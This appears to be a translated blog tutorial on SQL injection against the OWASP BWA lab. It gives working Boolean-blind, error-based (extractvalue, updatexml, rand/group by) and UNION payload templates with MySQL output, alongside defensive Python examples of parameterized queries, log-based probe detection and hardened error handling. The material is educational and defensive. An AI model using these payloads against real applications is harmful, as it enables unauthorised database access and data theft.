SQL Injection (literacy) and SQL Injection

Source: Internet
Author: User
Tags: owasp zap


SQL injection is one of the most common ways of attacking web applications. It does not exploit operating system bugs; it targets carelessness in the application's own code. Through crafted SQL statements an attacker can log in without an account or even tamper with the database. The following is an in-depth introduction to SQL injection; if you are interested, read on.

General idea of SQL injection attacks

1. Find the SQL injection point

2. Determine the server type and the back-end database type

3. Carry out the SQL injection attack according to the server and database identified

SQL Injection

SQL injection means inserting malicious SQL commands into a web form (or any other input) so that the server passes them on to the database, which ends up executing them.

To learn about SQL injection, first set up a target environment. I use OWASP BWA (Broken Web Applications); if you are interested, you can download the installation package from the official website. Besides SQL injection, BWA contains many other practice targets, and it is built to be used with the OWASP ZAP penetration-testing tool.

$id = $_GET['id'];                                                        // id taken straight from the query string, unchecked
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'"; // id spliced directly into the SQL text
$result = mysql_query($getid) or die('<pre>' . mysql_error() . '</pre>'); // the raw database error is echoed to the page
$num = mysql_numrows($result);                                            // number of rows returned

This is very simple PHP code: it takes the id value from the front end, submits it to the database for execution, and returns the result to the front end.

For example, enter id = 1 in the OWASP form and click Submit; the page shows the record returned for that id.

Anyone with a little back-end or database knowledge can see that the code above has a serious problem: it never validates the id value. Whatever is typed into the submit box is sent to the database and executed. For example, entering 1' or '1' = '1 in the input box turns the statement into:

-- the command that was meant to run
SELECT first_name, last_name FROM users WHERE user_id = '1'
-- what the database actually executes after the injection
SELECT first_name, last_name FROM users WHERE user_id = '1' or '1' = '1'

Note that the single quote is a very important part of SQL injection: the trailing '1' = '1 in the payload exists to close the single quote that the original statement opens, so the statement stays syntactically valid.

Because the or condition is always true, the query returns every row of the users table.
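To make the difference concrete, here is an added example (not code from the page or from OWASP) that rebuilds the lookup in Python with the sqlite3 module standing in for PHP and MySQL; the users table and its rows are constructed sample data. lookup_concatenated reproduces the PHP above, and lookup_parameterized is the fix: the input is bound as a value, so the quote and the or never become part of the SQL text.

```python
import sqlite3

# Constructed sample rows standing in for the "users" table of the PHP snippet.
USERS = [
    (1, "admin", "admin"),
    (2, "Gordon", "Brown"),
    (3, "Hack", "Me"),
]


def make_db():
    """Build an in-memory SQLite database holding the constructed users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", USERS)
    return conn


def lookup_concatenated(conn, user_input):
    """Mirror of the vulnerable PHP: the raw input is spliced into the SQL text."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = '" + user_input + "'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, user_input):
    """Hardened form: the value travels as a bound parameter, never as SQL text."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(sql, (user_input,)).fetchall()


if __name__ == "__main__":
    conn = make_db()
    benign = "1"
    injected = "1' or '1'='1"  # the payload discussed in the text
    print("concatenated, benign   :", lookup_concatenated(conn, benign))
    print("concatenated, injected :", lookup_concatenated(conn, injected))
    print("parameterized, benign  :", lookup_parameterized(conn, benign))
    print("parameterized, injected:", lookup_parameterized(conn, injected))
```

With the injected input the concatenated query returns all three rows, while the parameterized query returns nothing: the whole string is compared against user_id as one opaque value and matches no record.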

The following describes three main injection types.

Boolean-based principle analysis

First, a word about AND and OR in SQL.

AND and OR combine two or more conditions in a WHERE clause.

AND: returns the records that satisfy both the first and the second condition.

OR: returns the records that satisfy either the first or the second condition.

In set-theory terms, AND is the intersection and OR is the union.

The following is the query content of a database.

mysql> select * from students;
+-------+-------+-----+
| id    | name  | age |
+-------+-------+-----+
| 10056 | Doris |  20 |
| 10058 | Jaune |  22 |
| 10060 | Alisa |  29 |
+-------+-------+-----+
3 rows in set (0.00 sec)

1)

mysql> select * from students where TRUE;
+-------+-------+-----+
| id    | name  | age |
+-------+-------+-----+
| 10056 | Doris |  20 |
| 10058 | Jaune |  22 |
| 10060 | Alisa |  29 |
+-------+-------+-----+
3 rows in set (0.00 sec)

2)

mysql> select * from students where FALSE;
Empty set (0.00 sec)

3)

mysql> select * from students where id = 10056 and TRUE;
+-------+-------+-----+
| id    | name  | age |
+-------+-------+-----+
| 10056 | Doris |  20 |
+-------+-------+-----+
1 row in set (0.00 sec)

4)

mysql> select * from students where id = 10056 and FALSE;
Empty set (0.00 sec)

5)

mysql> select * from students where id = 10056 or TRUE;
+-------+-------+-----+
| id    | name  | age |
+-------+-------+-----+
| 10056 | Doris |  20 |
| 10058 | Jaune |  22 |
| 10060 | Alisa |  29 |
+-------+-------+-----+
3 rows in set (0.00 sec)

6)

mysql> select * from students where id = 10056 or FALSE;
+-------+-------+-----+
| id    | name  | age |
+-------+-------+-----+
| 10056 | Doris |  20 |
+-------+-------+-----+
1 row in set (0.00 sec)

The familiar "and 1 = 1" and "and 1 = 2" are just variants of "and TRUE" and "and FALSE".

This is the most basic Boolean injection. On this basis, conditions can be combined freely.

Dictionary brute-force approach

and exists (select * from ?)   -- ? is a guessed table name
and exists (select ? from x)   -- ? is a guessed column name of table x

Substring bisection approach

and (length((select schema_name from information_schema.schemata limit 1)) > ?)         -- determine the length of the database name
and (substr((select schema_name from information_schema.schemata limit 1), 1, 1) > '?')  -- narrow down the first character
and (substr((select schema_name from information_schema.schemata limit 1), 1, 1) < '?')  -- by bisection on the character range

Boolean-based summary

From the introduction above we know that Boolean-based injection needs a normally accessible address to start from, for example http://redtiger.labs.overthewire.org/level4.php?id=1. That page loads normally, which tells us the record with id = 1 exists. Everything below builds on it. First, determine the length of a keyword, then construct the next request from the answer:

id=1 and (select length(keyword) from table)=1

The server sends back a response. If it differs from the original response, then (select length(keyword) from table)=1 evaluated to false, so the keyword length is not 1. Continue constructing:

id=1 and (select length(keyword) from table)=15

If this returns the normal page, the condition was true and the keyword length is 15.

Why find an existing id at the beginning? Mainly to construct a known-true baseline. Boolean-based injection relies on the response differing between a true and a false query result to find what you are after.

For the keyword value itself, MySQL offers substr(string, start, length), which returns length characters starting at position start:

id=1 and (select substr(keyword,1,1) from table)='A'

Proceeding character by character in this way, you can recover the value of keyword from the database.

Boolean-based injection is very inefficient: many requests are needed to determine a single value. Although a script can automate this, other methods are preferred when they are available.
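The many near-identical requests this technique needs are also its most visible trace in server logs. The following added example (not part of the original article) parses a few constructed Apache-style access log lines, URL-decodes the request path, matches the Boolean-probe shapes the text describes (an and/or followed by a subquery, a 1=1 style comparison, or length()/substr()), and reports clients that issued several such requests. The log lines, the probe regex, and the threshold of three requests are all assumptions for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed access-log lines (Apache combined style, trimmed) imitating the
# repeated probes described in the text: same page, one parameter varied,
# each request answering a single true/false question.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /level4.php?id=1 HTTP/1.1" 200 512
10.0.0.5 - - [10/Oct/2023:13:55:37 +0000] "GET /level4.php?id=1%20and%20(select%20length(keyword)%20from%20table)=1 HTTP/1.1" 200 498
10.0.0.5 - - [10/Oct/2023:13:55:38 +0000] "GET /level4.php?id=1%20and%20(select%20length(keyword)%20from%20table)=15 HTTP/1.1" 200 512
10.0.0.5 - - [10/Oct/2023:13:55:39 +0000] "GET /level4.php?id=1%20and%20(select%20substr(keyword,1,1)%20from%20table)='A' HTTP/1.1" 200 498
10.0.0.5 - - [10/Oct/2023:13:55:40 +0000] "GET /level4.php?id=1%20and%20(select%20substr(keyword,1,1)%20from%20table)='B' HTTP/1.1" 200 512
10.0.0.9 - - [10/Oct/2023:13:56:01 +0000] "GET /level4.php?id=2 HTTP/1.1" 200 520
10.0.0.9 - - [10/Oct/2023:13:56:02 +0000] "GET /index.php HTTP/1.1" 200 1024
"""

# client ip, request path, status code, response size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" (\d{3}) (\d+)')

# Boolean-probe fingerprint (assumed, illustrative): an AND/OR tacked onto a
# value, followed by a subquery, a numeric comparison, or length()/substr().
PROBE_RE = re.compile(
    r"\b(?:and|or)\b\s*\(?\s*(?:select\b|\d+\s*=\s*\d+|length\s*\(|substr\s*\()",
    re.IGNORECASE,
)


def parse_line(line):
    """Return (client_ip, decoded_path, status, size), or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, raw_path, status, size = m.groups()
    return ip, unquote_plus(raw_path), int(status), int(size)


def find_probes(log_text):
    """Map client IP -> list of decoded request paths that look like Boolean probes."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, path, _status, _size = parsed
        if PROBE_RE.search(path):
            hits[ip].append(path)
    return dict(hits)


def suspicious_clients(log_text, threshold=3):
    """Clients that issued at least `threshold` probe-shaped requests (threshold is an assumed tuning value)."""
    return sorted(ip for ip, paths in find_probes(log_text).items() if len(paths) >= threshold)


if __name__ == "__main__":
    for ip, paths in find_probes(SAMPLE_LOG).items():
        print(ip, "->", len(paths), "probe-shaped requests")
    print("flagged:", suspicious_clients(SAMPLE_LOG))
```

Decoding the path before matching matters: the probes arrive percent-encoded, and a pattern run over the raw line would miss every one of them. The per-client count, rather than any single match, is what separates the probing client from the ordinary visitor.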

Error-based principle analysis

Error echo

Error-echo SQL injection means making the database raise an error whose message contains the data, which the application then displays on the page.

Functions used

count() counts the number of rows (an aggregate function, like sum()).

For example: select count(*) from information_schema.tables;

rand() generates a random number between 0 and 1.

floor() rounds down.

group by groups the results according to the rule we specify.

concat concatenates data from different rows of the same column that meet the condition, separated by commas. (Strictly, that description is of group_concat(); concat() joins the strings passed to it in a single row.)

SQL statement used for error echo

Type 1: based on the rand() and group by error

This exploits the MySQL bug "group by part of rand() returns duplicate key error". The MySQL manual says the following about rand() and group by:

RAND() in a WHERE clause is re-evaluated every time the WHERE is executed. You cannot use a column with RAND() values in an ORDER BY clause, because ORDER BY would evaluate the column multiple times.

This bug surfaces as a duplicate key error, and the data is carried out inside that error message.

Formula: Username = admin' and (select 1 from (select count(*), concat(floor(rand(0)*2), 0x23, (SQL statement of the data you want to obtain)) x from information_schema.tables group by x) a) and '1' = '1

Type 2: XPath error-based information disclosure

Here we mainly use ExtractValue() and UpdateXML(). MySQL 5.1 and later provide built-in XML parsing functions, so these two functions are only available in MySQL 5.1 and later.

From the MySQL manual:

Syntax: EXTRACTVALUE(XML_document, XPath_string);

The first parameter, XML_document, is a string: the XML document (called Doc in the manual).

The second parameter, XPath_string, is a string in XPath format. If you are not familiar with XPath syntax, tutorials are easy to find online.

Purpose: return the string containing the queried value from the target XML.

Syntax: UPDATEXML(XML_document, XPath_string, new_value);

The first parameter, XML_document, is a string: the XML document (called Doc in the manual).

The second parameter, XPath_string, is a string in XPath format. If you are not familiar with XPath syntax, tutorials are easy to find online.

The third parameter, new_value, is a string that replaces the data matched by the XPath condition.

Purpose: change the value of a matching node in the document.

So all we need is an XPath_string that is not valid XPath: the error message then echoes it back. The message carries at most 32 characters, so for longer values combine it with mid().

Formula 1: Username = admin' and (extractvalue(1, concat(0x7e, (SQL statement of the data you want to obtain)))) and '1' = '1

Formula 2: Username = admin' and (updatexml(1, concat(0x7e, (SQL statement of the data you want to obtain)), 1)) and '1' = '1

Error-echo injection uses the SQL statement itself to display data on the page, but it is often limited to a single echo per request, so its efficiency is not that high. Still, it is a clear step up from Boolean injection.
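Both error-based variants depend on the same application habit shown in the PHP snippet at the top of the article: the raw database error is written into the page. The following added example (not from the article or OWASP) contrasts that behaviour with a hardened handler in Python with sqlite3 standing in for PHP and MySQL; the users table is constructed sample data. page_with_error_echo plays the role of mysql_query(...) or die(mysql_error()), while page_hardened binds the parameter and keeps the database's message in the server log only.

```python
import logging
import sqlite3

logging.basicConfig(level=logging.WARNING, format="%(levelname)s %(message)s")
log = logging.getLogger("app")


def make_db():
    """In-memory users table with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "admin", "admin"), (2, "Gordon", "Brown")],
    )
    return conn


def page_with_error_echo(conn, user_input):
    """Equivalent of `or die(mysql_error())`: the database's own message goes to the page."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = '" + user_input + "'"
    try:
        return "OK: " + repr(conn.execute(sql).fetchall())
    except sqlite3.Error as exc:
        # This is the channel that error-based injection reads data from.
        return "<pre>" + str(exc) + "</pre>"


def page_hardened(conn, user_input):
    """Bound parameter plus a generic client-facing message; details go only to the server log."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    try:
        return "OK: " + repr(conn.execute(sql, (user_input,)).fetchall())
    except sqlite3.Error as exc:
        log.warning("database error for input %r: %s", user_input, exc)
        return "An error occurred while processing your request."


if __name__ == "__main__":
    conn = make_db()
    for value in ("1", "1'"):          # a normal id and the lone-quote probe from the text
        print("echoing :", repr(value), "->", page_with_error_echo(conn, value))
        print("hardened:", repr(value), "->", page_hardened(conn, value))
```

The lone single quote is the simplest way to see the difference: the echoing handler returns the parser's complaint inside a pre block, exactly the text an attacker would read the extracted data out of, while the hardened handler treats the quote as part of an ordinary value, finds no match, and never exposes the database layer at all.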

Union query injection

To understand union query injection, you must first understand the union query itself. UNION merges the result sets of two or more SELECT statements. For example:

SELECT username, password FROM account;

The result is

Administrator 123456

SELECT id, title FROM article;

The result is

1 Hello, World

SELECT username, password FROM account UNION SELECT id, title FROM article;

The result is

Administrator 123456

1 Hello, World

Compared with the many nested requests of Boolean injection, union injection is relatively easy, because it returns the information directly rather than a true/false value. As described above, UNION puts the results together. The query before the UNION is made to return nothing, typically with a condition such as id = -1, so that only the injected SELECT's rows come back.

1)

mysql> select name from students where id = -1 union select schema_name from information_schema.schemata;   -- database names
+--------------------+
| name               |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| rumRaisin          |
| t3st               |
| test               |
+--------------------+
6 rows in set (0.00 sec)

2)

mysql> select name from students where id = -1 union select table_name from information_schema.tables where table_schema = 't3st';   -- table names
+----------+
| name     |
+----------+
| master   |
| students |
+----------+
2 rows in set (0.00 sec)

3)

mysql> select name from students where id = -1 union select column_name from information_schema.columns where table_name = 'students';   -- column names
+------+
| name |
+------+
| id   |
| name |
| age  |
+------+
3 rows in set (0.00 sec)

The UNION operator merges the result sets of two or more SELECT statements. Note that every SELECT inside the UNION must have the same number of columns, the columns must have compatible data types, and the columns in each SELECT must be in the same order.

For example, the OWASP page from the beginning returns two values, first_name and sur_name. When the server receives the query result, the first and second values of each row are passed to first_name and sur_name; if there are more or fewer columns, an error is reported.

So to use a union query for injection, you must first work out how many columns the back-end query selects and which of them are displayed to the user.

Guessing the number of columns

-1 union select 1
-1 union select 1, 2
-1 union select 1, 2, 3   -- and so on, until the page displays normally

For example, this statement

-1 UNION SELECT 1,2,3,4

If the values 3 and 4 appear on the page, the query result has four columns and the third and fourth are the ones displayed. The corresponding union statement is then:

-1 UNION SELECT 1,2,username,password FROM table
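The column-count rule and the id = -1 trick are easy to verify on a small database. The following added example (not from the article) uses Python's sqlite3 module with the account and article tables from the text as constructed sample data; it shows a two-column UNION merging both tables, the error the database raises when the column counts differ, and a left-hand SELECT that matches nothing so that only the right-hand rows come back.

```python
import sqlite3


def make_db():
    """Constructed account and article tables mirroring the text's example."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE account (username TEXT, password TEXT)")
    conn.execute("INSERT INTO account VALUES ('Administrator', '123456')")
    conn.execute("CREATE TABLE article (id INTEGER, title TEXT)")
    conn.execute("INSERT INTO article VALUES (1, 'Hello, World')")
    return conn


def union_two_tables(conn):
    """Both SELECTs have two columns, so UNION merges the two result sets."""
    return conn.execute(
        "SELECT username, password FROM account UNION SELECT id, title FROM article"
    ).fetchall()


def union_column_mismatch(conn):
    """One column on the left, two on the right: the database refuses the query.

    Returns the error text, or None if (unexpectedly) no error was raised."""
    try:
        conn.execute("SELECT username FROM account UNION SELECT id, title FROM article").fetchall()
        return None
    except sqlite3.OperationalError as exc:
        return str(exc)


def union_with_empty_left(conn):
    """The id = -1 idea: the left SELECT matches nothing, so only the right side's rows appear."""
    return conn.execute(
        "SELECT id, title FROM article WHERE id = -1 UNION SELECT username, password FROM account"
    ).fetchall()


if __name__ == "__main__":
    conn = make_db()
    print("union of two tables :", union_two_tables(conn))
    print("column mismatch     :", union_column_mismatch(conn))
    print("empty left side     :", union_with_empty_left(conn))
```

The mismatch error is the same signal the column-guessing sequence above relies on, which is also why an application that echoes database errors makes that step trivial; with a generic error page the attacker only sees that something failed, not why.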

Summary

There are roughly five types of SQL injection. The two not covered above are stacked queries and time-based blind injection. Stacked queries send several statements in one request, separated by ';', much as UNION joins two SELECTs. Time-based injection uses the sleep() function to delay the database's response, so extracting data with it is slow. (A sixth type, inline injection, overlaps with the material above and is not discussed separately.)

Reference: I explored SQL injection bit by bit. Most of the content of this post comes from the company's internal server (the company regularly runs assessments to see what you have learned). At the time I kept no references because I was on the intranet, and finding the cited articles again is very difficult. Sorry.

Well, the above is all about this article. I hope this article will help you in your study or work. If you have any questions, please leave a message.
